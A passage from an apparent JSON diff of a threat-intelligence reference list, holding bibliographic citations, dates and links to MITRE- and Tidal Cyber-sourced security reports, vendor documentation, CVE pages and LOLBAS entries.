"bb474e88-b7bb-4b92-837c-95fe7bdd03f7", + "value": "AWS Create IAM User" + }, + { + "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2020-06-18T00:00:00Z", + "refs": [ + "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html" + ], + "source": "MITRE", + "title": "Creating a Process" + }, + "related": [], + "uuid": "c46331cb-328a-46e3-89c4-e43fa345d6e8", + "value": "GNU Fork" + }, + { + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "source": "MITRE", + "title": "Creating Launch Daemons and Agents" + }, + "related": [], + "uuid": "310d18f8-6f9a-48b7-af12-6b921209d1ab", + "value": "AppleDocs Launch Agent Daemons" + }, + { + "description": "Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.", + "meta": { + "date_accessed": "2016-04-27T00:00:00Z", + "date_published": "2005-01-21T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx" + ], + "source": "MITRE", + "title": "Creating logon scripts" + }, + "related": [], + "uuid": "896cf5dd-3fe7-44ab-bbaf-d8b2b9980dca", + "value": "TechNet Logon Scripts" + }, + { + "description": "Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-03-31T00:00:00Z", + "refs": [ + "https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials" + ], + "source": "MITRE", + "title": "Creating short-lived service account credentials" + }, + "related": [], + "uuid": "c4befa09-3c7f-49f3-bfcc-4fcbb7bace22", + "value": "Google Cloud Service Account Credentials" + }, + { + "description": "Apple. (2016, September 9). Creating XPC Services. Retrieved April 19, 2022.", + "meta": { + "date_accessed": "2022-04-19T00:00:00Z", + "date_published": "2016-09-09T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1" + ], + "source": "MITRE", + "title": "Creating XPC Services" + }, + "related": [], + "uuid": "029acdee-95d6-47a7-86de-0f6b925cef9c", + "value": "creatingXPCservices" + }, + { + "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-02-19T00:00:00Z", + "refs": [ + "https://github.com/Neohapsis/creddump7" + ], + "source": "MITRE", + "title": "creddump7" + }, + "related": [], + "uuid": "276975da-7b5f-49aa-975e-4ac9bc527cf2", + "value": "GitHub Creddump7" + }, + { + "description": "Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2023-06-21T00:00:00Z", + "refs": [ + "https://twitter.com/MsftSecIntel/status/1671579359994343425" + ], + "source": "MITRE", + "title": "Credential Attacks" + }, + "related": [], + "uuid": "5af0008b-0ced-5d1d-bbc9-6c9d60835071", + "value": "Microsoft Midnight Blizzard Replay Attack" + }, + { + "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.", + "meta": { + "date_accessed": "2018-07-20T00:00:00Z", + "date_published": "2018-03-01T00:00:00Z", + "refs": [ + "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104" + ], + "source": "MITRE", + "title": "Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection" + }, + "related": [], + "uuid": "3cdeb2a2-9582-4725-a132-6503dbe04e1d", + "value": "Anomali Template Injection MAR 2018" + }, + { + "description": "Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.", + "meta": { + "date_accessed": "2020-11-24T00:00:00Z", + "date_published": "2013-10-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN" + ], + "source": "MITRE", + "title": "Credential Locker Overview" + }, + "related": [], + "uuid": "77505354-bb08-464c-9176-d0015a62c7c9", + "value": "Microsoft Credential Locker" + }, + { + "description": "Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). Retrieved November 24, 2020.", + "meta": { + "date_accessed": "2020-11-24T00:00:00Z", + "date_published": "2018-12-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea" + ], + "source": "MITRE", + "title": "CredEnumarateA function (wincred.h)" + }, + "related": [], + "uuid": "ec3e7b3f-99dd-4f2f-885b-09d66b01fe3e", + "value": "Microsoft CredEnumerate" + }, + { + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2015-07-15T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + ], + "source": "MITRE", + "title": "Criminal Hideouts for Lease: Bulletproof Hosting Services" + }, + "related": [], + "uuid": "527de869-3c76-447c-98c4-c37a2acf75e2", + "value": "TrendmicroHideoutsLease" + }, + { + "description": "Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.", + "meta": { + "date_accessed": "2022-01-26T00:00:00Z", + "date_published": "2021-12-07T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/" + ], + "source": "MITRE", + "title": "Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes" + }, + "related": [], + "uuid": "54b5d8af-21f0-4d1c-ada8-b87db85dd742", + "value": "doppelpaymer_crowdstrike" + }, + { + "description": "Team Huntress. (2023, April 21). Critical Vulnerabilities in PaperCut Print Management Software. Retrieved May 8, 2023.", + "meta": { + "date_accessed": "2023-05-08T00:00:00Z", + "date_published": "2023-04-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software" + ], + "source": "Tidal Cyber", + "title": "Critical Vulnerabilities in PaperCut Print Management Software" + }, + "related": [], + "uuid": "874f40f9-146d-4a52-93fd-9b2e7981b6da", + "value": "Critical Vulnerabilities in PaperCut Print Management Software" + }, + { + "description": "Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.", + "meta": { + "date_accessed": "2022-03-23T00:00:00Z", + "date_published": "2019-07-07T00:00:00Z", + "refs": [ + "https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" + ], + "source": "MITRE", + "title": "Croatia government agencies targeted with news SilentTrinity malware" + }, + "related": [], + "uuid": "b4945fc0-b89b-445c-abfb-14959deba3d0", + "value": "Security Affairs SILENTTRINITY July 2019" + }, + { + "description": "Paul Vixie. (n.d.). crontab(5) - Linux man page. Retrieved December 19, 2017.", + "meta": { + "date_accessed": "2017-12-19T00:00:00Z", + "refs": [ + "https://linux.die.net/man/5/crontab" + ], + "source": "MITRE", + "title": "crontab(5) - Linux man page" + }, + "related": [], + "uuid": "0339c2ab-7a08-4976-90eb-1637c23c5644", + "value": "Die.net Linux crontab Man Page" + }, + { + "description": "Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2013-02-11T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door" + ], + "source": "MITRE", + "title": "Cross-Platform Frutas RAT Builder and Back Door" + }, + "related": [], + "uuid": "8d9f88be-9ddf-485b-9333-7e41704ec64f", + "value": "Symantec Frutas Feb 2013" + }, + { + "description": "Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.", + "meta": { + "date_accessed": "2021-07-30T00:00:00Z", + "date_published": "2019-08-04T00:00:00Z", + "refs": [ + "https://labs.bishopfox.com/tech-blog/sliver" + ], + "source": "MITRE", + "title": "Cross-platform General Purpose Implant Framework Written in Golang" + }, + "related": [], + "uuid": "51e67e37-2d61-4228-999b-bec6f80cf106", + "value": "Bishop Fox Sliver Framework August 2019" + }, + { + "description": "Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2013-10-16T00:00:00Z", + "refs": [ + "https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "source": "MITRE", + "title": "CrowdCasts Monthly: You Have an Adversary Problem" + }, + "related": [], + "uuid": "2062a229-58b3-4610-99cb-8907e7fbb350", + "value": "Crowdstrike CrowdCast Oct 2013" + }, + { + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2018-02-26T00:00:00Z", + "refs": [ + "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + ], + "source": "MITRE", + "title": "CrowdStrike 2018 Global Threat Report" + }, + "related": [], + "uuid": "6c1ace5b-66b2-4c56-9301-822aad2c3c16", + "value": "Crowdstrike Global Threat Report Feb 2018" + }, + { + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2021-06-07T00:00:00Z", + "refs": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" + ], + "source": "MITRE", + "title": "CrowdStrike 2021 Global Threat Report" + }, + "related": [], + "uuid": "ec58e524-6de5-4cbb-a5d3-984b9b652f26", + "value": "CrowdStrike GTR 2021 June 2021" + }, + { + "description": "CrowdStrike. (2022, June 01). CrowdStrike Adversary Carbon Spider. Retrieved June 01, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/carbon-spider/" + ], + "source": "Tidal Cyber", + "title": "CrowdStrike Adversary Carbon Spider" + }, + "related": [], + "uuid": "9e28d375-c4a7-405f-9fff-7374c19f3af7", + "value": "CrowdStrike Adversary Carbon Spider" + }, + { + "description": "CrowdStrike. (2022, May 4). CrowdStrike Adversary Cozy Bear. Retrieved May 4, 2022.", + "meta": { + "date_accessed": "2022-05-04T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/cozy-bear/" + ], + "source": "Tidal Cyber", + "title": "CrowdStrike Adversary Cozy Bear" + }, + "related": [], + "uuid": "0998ad7a-b4aa-44af-a665-dc58a3a6f800", + "value": "CrowdStrike Adversary Cozy Bear" + }, + { + "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" + ], + "source": "MITRE", + "title": "CrowdStrike Adversary Labyrinth Chollima" + }, + "related": [], + "uuid": "ffe31bbf-a40d-4285-96a0-53c54298a680", + "value": "CrowdStrike Labyrinth Chollima Feb 2022" + }, + { + "description": "CrowdStrike. (2022, June 25). CrowdStrike Adversary Ocean Bufallo. Retrieved June 25, 2022.", + "meta": { + "date_accessed": "2022-06-25T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/ocean-buffalo/" + ], + "source": "Tidal Cyber", + "title": "CrowdStrike Adversary Ocean Buffalo" + }, + "related": [], + "uuid": "466795cb-0269-4d0c-a48c-d71e9dfd9a3c", + "value": "CrowdStrike Adversary Ocean Buffalo" + }, + { + "description": "CrowdStrike. (2022, May 4). CrowdStrike Adversary Venomous Bear. Retrieved May 4, 2022.", + "meta": { + "date_accessed": "2022-05-04T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/venomous-bear/" + ], + "source": "Tidal Cyber", + "title": "CrowdStrike Adversary Venomous Bear" + }, + "related": [], + "uuid": "8c04f2b8-74ba-44a5-9580-96eabdbbcda9", + "value": "CrowdStrike Adversary Venomous Bear" + }, + { + "description": "CrowdStrike. (2022, June 23). CrowdStrike Adversary Wizard Spider. Retrieved June 23, 2022.", + "meta": { + "date_accessed": "2022-06-23T00:00:00Z", + "refs": [ + "https://adversary.crowdstrike.com/en-US/adversary/wizard-spider/" + ], + "source": "Tidal Cyber", + "title": "CrowdStrike Adversary Wizard Spider" + }, + "related": [], + "uuid": "05f382c4-5163-49e0-a8a0-cf3a5992ef18", + "value": "CrowdStrike Adversary Wizard Spider" + }, + { + "description": "Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-02-25T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/" + ], + "source": "MITRE", + "title": "CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks" + }, + "related": [], + "uuid": "4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e", + "value": "Crowdstrike DriveSlayer February 2022" + }, + { + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": "2014-06-09T00:00:00Z", + "refs": [ + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "CrowdStrike Intelligence Report: Putter Panda" + }, + "related": [], + "uuid": "413962d0-bd66-4000-a077-38c2677995d1", + "value": "CrowdStrike Putter Panda" + }, + { + "description": "Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.", + "meta": { + "date_accessed": "2016-10-12T00:00:00Z", + "date_published": "2016-09-09T00:00:00Z", + "refs": [ + "http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml" + ], + "source": "MITRE", + "title": "Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives" + }, + "related": [], + "uuid": "087b9bf1-bd9e-4cd6-a386-d9d2c812c927", + "value": "Softpedia MinerC" + }, + { + "description": "Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.", + "meta": { + "date_accessed": "2023-09-05T00:00:00Z", + "date_published": "2023-07-25T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/" + ], + "source": "MITRE", + "title": "Cryptojacking: Understanding and defending against cloud compute resource abuse" + }, + "related": [], + "uuid": "e2dbc963-b913-5a44-bb61-88a3f0d8d8a3", + "value": "Microsoft Cryptojacking 2023" + }, + { + "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.", + "meta": { + "date_accessed": "2019-06-18T00:00:00Z", + "date_published": "2018-04-12T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata" + ], + "source": "MITRE", + "title": "CryptUnprotectData function" + }, + "related": [], + "uuid": "258088ae-96c2-4520-8eb5-1a7e540a9a24", + "value": "Microsoft CryptUnprotectData April 2018" + }, + { + "description": "LOLBAS. (2018, May 25). Csc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Csc/" + ], + "source": "Tidal Cyber", + "title": "Csc.exe" + }, + "related": [], + "uuid": "276c9e55-4673-426d-8f49-06edee2e3b30", + "value": "Csc.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Cscript.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cscript/" + ], + "source": "Tidal Cyber", + "title": "Cscript.exe" + }, + "related": [], + "uuid": "428b6223-63b7-497f-b13a-e472b4583a9f", + "value": "Cscript.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). csi.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/" + ], + "source": "Tidal Cyber", + "title": "csi.exe" + }, + "related": [], + "uuid": "b810ee91-de4e-4c7b-8fa8-24dca95133e5", + "value": "csi.exe - LOLBAS Project" + }, + { + "description": "Albinowax Timo Goosen. (n.d.). CSV Injection. Retrieved February 7, 2022.", + "meta": { + "date_accessed": "2022-02-07T00:00:00Z", + "refs": [ + "https://owasp.org/www-community/attacks/CSV_Injection" + ], + "source": "MITRE", + "title": "CSV Injection" + }, + "related": [], + "uuid": "0cdde66c-a7ae-48a2-8ade-067643de304d", + "value": "OWASP CSV Injection" + }, + { + "description": "Microsoft. (n.d.). CurrentControlSet\\Services Subkey Entries. Retrieved November 30, 2014.", + "meta": { + "date_accessed": "2014-11-30T00:00:00Z", + "refs": [ + "http://support.microsoft.com/KB/103000" + ], + "source": "MITRE", + "title": "CurrentControlSet\\Services Subkey Entries" + }, + "related": [], + "uuid": "be233077-7bb4-48be-aecf-03258931527d", + "value": "Microsoft Subkey" + }, + { + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2020-12-13T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + ], + "source": "MITRE", + "title": "Customer Guidance on Recent Nation-State Cyber Attacks" + }, + "related": [], + "uuid": "b486ae40-a854-4998-bf1b-aaf6ea2047ed", + "value": "Microsoft SolarWinds Customer Guidance" + }, + { + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.", + "meta": { + "date_accessed": "2020-12-30T00:00:00Z", + "date_published": "2020-12-13T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + ], + "source": "MITRE", + "title": "Customer Guidance on Recent Nation-State Cyber Attacks" + }, + "related": [], + "uuid": "47031992-841f-4ef4-87c6-bb4c077fb8dc", + "value": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks" + }, + { + "description": "Apple. (2016, September 13). Customizing Login and Logout. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2016-09-13T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html" + ], + "source": "MITRE", + "title": "Customizing Login and Logout" + }, + "related": [], + "uuid": "9c0094b6-a8e3-4f4d-8d2e-33b408d44a06", + "value": "Login Scripts Apple Dev" + }, + { + "description": "Microsoft. (n.d.). Customizing the Desktop. Retrieved December 5, 2017.", + "meta": { + "date_accessed": "2017-12-05T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc938799.aspx" + ], + "source": "MITRE", + "title": "Customizing the Desktop" + }, + "related": [], + "uuid": "7cf8056e-6d3b-4930-9d2c-160d7d9636ac", + "value": "TechNet Screensaver GP" + }, + { + "description": "LOLBAS. (2021, November 14). CustomShellHost.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-11-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/" + ], + "source": "Tidal Cyber", + "title": "CustomShellHost.exe" + }, + "related": [], + "uuid": "96324ab1-7eb8-42dc-b19a-fa1d9f85e239", + "value": "CustomShellHost.exe - LOLBAS Project" + }, + { + "description": "Symantec Security Response. (2012, June 18). CVE-2012-1875 Exploited in the Wild - Part 1 (Trojan.Naid). Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2012-06-18T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid" + ], + "source": "MITRE", + "title": "CVE-2012-1875 Exploited in the Wild - Part 1 (Trojan.Naid)" + }, + "related": [], + "uuid": "e1531171-709c-4043-9e3a-af9e37f3ac57", + "value": "Symantec Naid in the Wild June 2012" + }, + { + "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-09-24T00:00:00Z", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2014-7169" + ], + "source": "MITRE", + "title": "CVE-2014-7169 Detail" + }, + "related": [], + "uuid": "c3aab918-51c6-4773-8677-a89b27a00eb1", + "value": "NVD CVE-2014-7169" + }, + { + "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-02-02T00:00:00Z", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2016-6662" + ], + "source": "MITRE", + "title": "CVE-2016-6662 Detail" + }, + "related": [], + "uuid": "1813c26d-da68-4a82-a959-27351dd5e51b", + "value": "NVD CVE-2016-6662" + }, + { + "description": "National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2017-0176" + ], + "source": "MITRE", + "title": "CVE-2017-0176 Detail" + }, + "related": [], + "uuid": "82602351-0ab0-48d7-90dd-f4536b4d009b", + "value": "NVD CVE-2017-0176" + }, + { + "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", + "meta": { + "date_accessed": "2017-10-27T00:00:00Z", + "date_published": "2017-04-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" + ], + "source": "MITRE", + "title": "CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler" + }, + "related": [], + "uuid": "1876a476-b2ff-4605-a78b-89443d21b063", + "value": "FireEye Attacks Leveraging HTA" + }, + { + "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2017-08-08T00:00:00Z", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625" + ], + "source": "MITRE", + "title": "CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability" + }, + "related": [], + "uuid": "402cb526-ef57-4d27-b96b-f98008abe716", + "value": "Microsoft CVE-2017-8625 Aug 2017" + }, + { + "description": "National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "date_published": "2019-10-09T00:00:00Z", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2019-3610" + ], + "source": "MITRE", + "title": "CVE-2019-3610 Detail" + }, + "related": [], + "uuid": "889b742e-7572-4aad-8944-7f071483b613", + "value": "NVD CVE-2019-3610" + }, + { + "description": "Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2021-06-03T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html" + ], + "source": "MITRE", + "title": "CVE-2021-30724: CVMServer Vulnerability in macOS and iOS" + }, + "related": [], + "uuid": "6f83da0c-d2ce-4923-ba32-c6886eb22587", + "value": "CVMServer Vuln" + }, + { + "description": "Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.", + "meta": { + "date_accessed": "2022-07-06T00:00:00Z", + "date_published": "2022-01-31T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/" + ], + "source": "MITRE", + "title": "CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit" + }, + "related": [], + "uuid": "84d5f015-9014-417c-b2a9-f650fe19d448", + "value": "Crowdstrike Kubernetes Container Escape" + }, + { + "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.", + "meta": { + "date_accessed": "2021-06-23T00:00:00Z", + "date_published": "2016-09-15T00:00:00Z", + "refs": [ + "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise" + ], + "source": "MITRE", + "title": "CyberArk Labs: From Safe Mode to Domain Compromise" + }, + "related": [], + "uuid": "bd9c14dd-0e2a-447b-a245-f548734d2400", + "value": "CyberArk Labs Safe Mode 2016" + }, + { + "description": "Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.", + "meta": { + "date_accessed": "2020-09-15T00:00:00Z", + "date_published": "2019-05-29T00:00:00Z", + "refs": [ + "https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44" + ], + "source": "MITRE", + "title": "Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems" + }, + "related": [], + "uuid": "583a01b6-cb4e-41e7-aade-ac2fd19bda4e", + "value": "Cyware Ngrok May 2019" + }, + { + "description": "Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.", + "meta": { + "date_accessed": "2021-03-08T00:00:00Z", + "date_published": "2020-10-28T00:00:00Z", + "refs": [ + "https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/" + ], + "source": "MITRE", + "title": "Cyberattacks target international conference attendees" + }, + "related": [], + "uuid": "8986c21c-16a0-4a53-8e37-9935bbbfaa4b", + "value": "Microsoft Phosphorus Oct 2020" + }, + { + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "meta": { + "date_accessed": "2018-11-02T00:00:00Z", + "date_published": "2017-10-22T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" + ], + "source": "MITRE", + "title": "\"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict" + }, + "related": [], + "uuid": "2db77619-72df-461f-84bf-2d1c3499a5c0", + "value": "Talos Seduploader Oct 2017" + }, + { + "description": "FBI. (2022, December 21). Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-12-21T00:00:00Z", + "refs": [ + "https://www.ic3.gov/Media/Y2022/PSA221221" + ], + "source": "MITRE", + "title": "Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users" + }, + "related": [], + "uuid": "deea5b42-bfab-50af-8d85-cc04fd317a82", + "value": "FBI-search" + }, + { + "description": "CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2018-09-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish" + ], + "source": "MITRE", + "title": "Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish" + }, + "related": [], + "uuid": "cda529b2-e152-4ff0-a6b3-d0305b09fef9", + "value": "Secureworks GOLD KINGSWOOD September 2018" + }, + { + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", + "meta": { + "date_accessed": "2021-12-10T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + ], + "source": "MITRE", + "title": "Cybereason Lab Analysis OSX.Pirrit" + }, + "related": [], + "uuid": "ebdf09ed-6eec-450f-aaea-067504ec25ca", + "value": "Cybereason OSX Pirrit" + }, + { + "description": 